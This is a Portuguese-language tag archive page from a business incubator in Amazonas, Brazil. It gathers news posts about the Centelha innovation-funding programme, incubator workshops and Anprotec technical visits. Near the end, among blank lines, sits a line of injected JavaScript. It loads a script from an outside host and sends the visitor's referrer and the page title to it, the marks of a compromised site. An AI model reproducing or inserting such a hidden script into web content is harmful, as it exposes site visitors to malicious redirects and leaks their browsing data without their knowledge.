• 92 3216-3892
  • secretaria@cide.org.br

Arquivo da tag Fapeam

Programa Centelha conta com R$ 1,8 milhão para apoiar ideias inovadoras no Amazonas

Recursos serão destinados à subvenção econômica (recursos não reembolsáveis) de até 28 projetos de inovação

Você tem uma ideia inovadora que possa impactar positivamente a vida das pessoas e acredita valer a pena empreender com ela? No Amazonas, o Programa Centelha, realizado pela Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), em parceria com a Financiadora de Inovação e Pesquisa (Finep), visa estimular a criação de empreendimentos inovadores e disseminar a cultura empreendedora no estado, oferecendo capacitações, recursos financeiros e suporte para transformar ideias em negócios de sucesso.

Com investimento na ordem de R$ 1.820.000,00 (um milhão oitocentos e vinte mil reais), os recursos disponibilizados serão destinados à subvenção econômica (recursos não reembolsáveis) de até 28 projetos de inovação, no valor unitário de até R$ 65.000,00 (sessenta e cinco mil reais).

Podem participar pessoas físicas, vinculadas ou não a empresas com até 12 meses de existência, anteriores à data de publicação do edital e faturamento bruto anual de até R$ 4.800.000,00 (quatro milhões e oitocentos mil reais), sediadas no Amazonas. Os projetos terão prazo de execução de até 12 meses, não prorrogáveis, contados a partir da data do Termo de Outorga.

 

Etapas – A submissão, avaliação e seleção das propostas serão realizadas em três fases distintas e eliminatórias, sendo elas Fase 1: Ideias Inovadoras; Fase 2: Projeto de Empreendimento e Fase 3: Projeto de Fomento. As propostas deverão ser submetidas por meio do Sistema Centelha (http://am.programacentelha.com.br), conforme formulário específico para cada uma das fases, respeitando os prazos estabelecidos do cronograma do edital.

Durante as três fases de seleção, os proponentes receberão capacitação gratuita online ou presencial, ministrada pela Fundação Certi, com o intuito de alinhar alguns conceitos importantes, para aprimorar suas ideias e projetos.

 

Sobre o Centelha – O Programa Centelha será realizado em 21 estados. No Amazonas, a iniciativa será executada pela Fapeam, sendo promovida pelo Ministério da Ciência, Tecnologia, Inovações e Comunicações (MCTIC) e pela Finep, em parceria com o Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) e o Conselho Nacional das Fundações Estaduais de Amparo à Pesquisa (Confap), e operada pela Fundação Certi.

O acesso ao edital do Programa Centelha Amazonas pode ser feito por meio do link: http://www.programacentelha.com.br/am/

Mais informações: Assessoria de Comunicação da Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam): 3878-4011 e 98407-8495.

FOTOS: Érico Xavier e Divulgação/Fapeam

 

Empreendedores conhecem etapas do Projeto Centelha

Representantes do CIDE e empresários no lançamento do Projeto Centelha

Consultores e empresários do Centro de Incubação e Desenvolvimento Empresarial (CIDE) participaram da abertura oficial do Programa Nacional de Apoio à Geração de Empreendimentos Inovadores (Programa Centelha), que aconteceu na manhã do dia 27, na Assembleia Legislativa do Amazonas (ALEAM), para conhecer detalhadamente as etapas do processo do edital.

Para os empresários instalados no CIDE, o Centelha oferece uma nova oportunidade para colocar em prática ideias inovadoras que precisam de apoio financeiros para se tornarem realidade. “Na nossa instituição há muitas iniciativas inovadoras, mas elas precisam de recursos econômicos para conseguir seu objetivo que é a produção e o serviço à sociedade. Sem esses recursos financeiros serão somente uma ideia no papel. Portanto, esse programa chegou em boa hora”, comentou o diretor executivo do CIDE, José B. Grosso.

O programa tem a finalidade de transformar ideias inovadoras em negócios de sucesso, oferecendo aos participantes, recursos financeiros, capacitações e suporte, e ampliação do networking. Nesse contexto, as incubadoras de empresas têm um papel importante. “Ao longo dos processos do Programa Centelha, nós teremos startups que precisarão ser incubadas”, disse a presidente da Fundação de Amparo à Pesquisa do Estado do Amazonas (FAPEAM), Márcia Perales.

O Programa Centelha será realizado em 21 estados. No Amazonas a iniciativa será executada pela Fapeam, e é promovida pelo Ministério da Ciência, Tecnologia, Inovações e Comunicações (MCTIC) e pela Finep, em parceria com o Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) e o Conselho Nacional das Fundações Estaduais de Amparo à Pesquisa (Confap), e podem concorrer ao Programa pessoas físicas ou empresas, que atenderem às exigências do edital, que está no site da própria Fapeam.

Empresários e consultores do CIDE no evento de lançamento.

Consultorres e empresários instalados no CIDE, no lançamento oficial do edital.

A presidente da Fapeam, Márcia Perales, incentiva à participação.

Abertura do evento, na Assembleia Legislativa do Amazonas (ALEAM).

 

Incubadoras de empresas trocam experiências para melhorar serviços

Consultoras da Anprotec conversam com os representantes das incubadoras

Consultoras da Anprotec conversam com os representantes das incubadoras

 

Com o objetivo de trocar antigas e novas experiências, sobre melhorias de planejamentos, consultorias, acompanhamentos aos empreendedores instalados em incubadoras de empresas, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) e mais seis incubadoras de empresas do Amazonas participaram, em março, na Universidade do Estado do Amazonas (UEA), do evento Workshop para Incubadoras.

 

O encontro serviu também para compartilhar experiências da implantação da metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE), chamado de “metodologia CERNE”, que auxilia as incubadoras no processo de gestão de incubação empresarial.

 

O encontro foi realizado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM) e a Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (ANPROTEC). “Na verdade, o método CERNE é implantado de acordo com a realidade de cada incubadora participante. Nenhuma incubadora é igual a outra. Por isso, a metodologia não permite cópias. Mas, podemos ajustar o exemplo de uma incubadora conforme a realidade da minha incubadora”, diz a consultora da ANPROTEC, Evelin Cristina Astolpho.

 

A consultora lembrou também que o compartilhamento de informações e experiências faz parte das atividades desenvolvidas pela ANPROTEC para melhorar a gestão das incubadoras de empresas. “A ‘métodologia CERNE’ diz o que tem que ser feito na gestão das incubadoras. Agora, como tem que ser feito ou realizado, cada incubadora vai colocar em prática de acordo com suas características, realidade e de acordo com as suas empresas instaladas”, diz Evelin Astolpho, acrescentando que todas as exposições feitas no evento são usadas para melhorar as práticas.

 

Nova visita técnica

Em março de 2016, o CIDE foi avaliado por consultores da ANPROTEC, que verificaram o grau de implantação da “metodologia Cerne”. Este ano, uma nova visita está programada. “A segunda visita técnica, sem data prevista, vai avaliar o que foi implantado em cada incubadora. Para cada centro de incubação fazemos um relatório e passamos à Fapeam. Nessa segunda visita técnica vamos ver o quanto avançou”, finaliza a consultora.

 

Para o diretor executivo do CIDE, José Barbosa Grosso, a metodologia auxilia na avaliação do potencial de cada empreendedor instalado. “Todo o processo de incubação é avaliado. Dessa forma, detectamos as metas, as dificuldades, os riscos, os objetivos e potenciais das empresas residentes aqui”, conclui.

Representantes de sete incubadoras de empresas participaram

Representantes de sete incubadoras de empresas participaram

 

Oc4

 

Oc3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CIDE recebe visita técnica da Anprotec

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

 

 

Os consultores da Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (Anprotec), Evelin Astolpho e Carlos Lamberti Júnior, estiveram no Centro de Incubação e Desenvolvimento Empresarial, no último dia 11, realizando a visita técnica do convênio de apoio às incubadoras, do edital Pró-Incubadoras da Fundação de Amparo à Pesquisa do Amazonas (Fapeam), além  de verificar o grau de implantação da metodologia CERNE no centro.

 

Conforme a representante da Anprotec, Evelin Astolpho, a visita serviu para verificar as atividades realizadas a favor dos empreendimentos instalados no CIDE. “O importante é comprovar que as ações que fazem parte do CERNE estão sendo realizadas e que os resultados estão sendo gerados, visando todo um desenvolvimento local da Região”, disse.

 

Para a coordenadora do projeto no CIDE, Rosália Padilha, a implantação do projeto traz melhorias para as empresas instaladas. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, destaca.

 

O edital prevê visitas às incubadoras de empresas a cada seis meses. “Todo o trabalho é feito em parceria com a Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), portanto, a próxima visita acontecerá de acordo com o que estabelece o edital”, lembra Evelin Astolpho, acrescentando que outras incubadoras de Manaus e de outros municípios vão ser visitadas.

 

Uma vez terminada a avaliação, os consultores se dirigiram a algumas empresas para conhecer os trabalhos desenvolvidos, em companhia do diretor executivo do CIDE, José Grosso, da equipe administrativa e da coordenadora do “CIDE2”, Elizabeth Araújo.

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

 

 

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

 

 

Consultores da Anprotec conhecem os produtos regionais no CIDE

Consultores da Anprotec conhecem os produtos regionais no CIDE

 

 

Equipe visita a Cheiro D´Folha, no CIDE.

Equipe visita a Cheiro D´Folha, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CIDE e “CIDE 2” participam de curso oferecido pela Anprotec e pela Fapeam

Vários gestores de incubadoras de empresas e lideranças de municípios do Amazonas participam de curso da Anprotec

Vários gestores de incubadoras de empresas e lideranças de municípios do Amazonas participam de curso da Anprotec

 

 

 

Com o objetivo de estar sempre atualizado em um mundo em constante transformação em todos os segmentos, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) e o CIDE Alvorada, conhecido como “CIDE 2”, participam do curso “Planejamento e Implantação de Incubadoras de Empresas”, oferecido pela Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec) e pela Fundação de Amparo à Pesquisa no Estado do Amazonas (Fapeam), na Assembleia Legislativa do Amazonas (ALE).

O curso termina na quinta-feira, 10, e visa discutir com os participantes uma metodologia para o planejamento e a implantação de uma incubadora de empresas de sucesso, sintonizando-a com o ecossistema de inovação da região. Participam também, gestores de outros municípios do Amazonas e do Estado do Acre.

“Além de Manaus, selecionamos seis municípios no interior do Estado, onde estabeleceremos estratégias juntamente com as lideranças locais, para implantar incubadoras de empresas, fortalecendo o município e gerando renda à população”, enfatiza a consultora da Anprotec, Evelin Astolpho.

Ainda segundo a consultora, os municípios selecionados para o programa de formação são Presidente Figueiredo, Tefé, Coari, Parintins, Manacapuru e Itacoatiara. “Estamos formando os agentes locais para que eles sejam os gestores das incubadoras de empresas e possam apoiar os novos empreendedores, desenvolver negócios, selecionar projetos e trabalhar para que as ideias inovadoras virem empresas no futuro”, conclui Evelin.

 

 

 

Consultor da Anprotec fala aos gestores.

Consultor da Anprotec fala aos gestores.

 

 

F2

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

Pular para a barra de ferramentas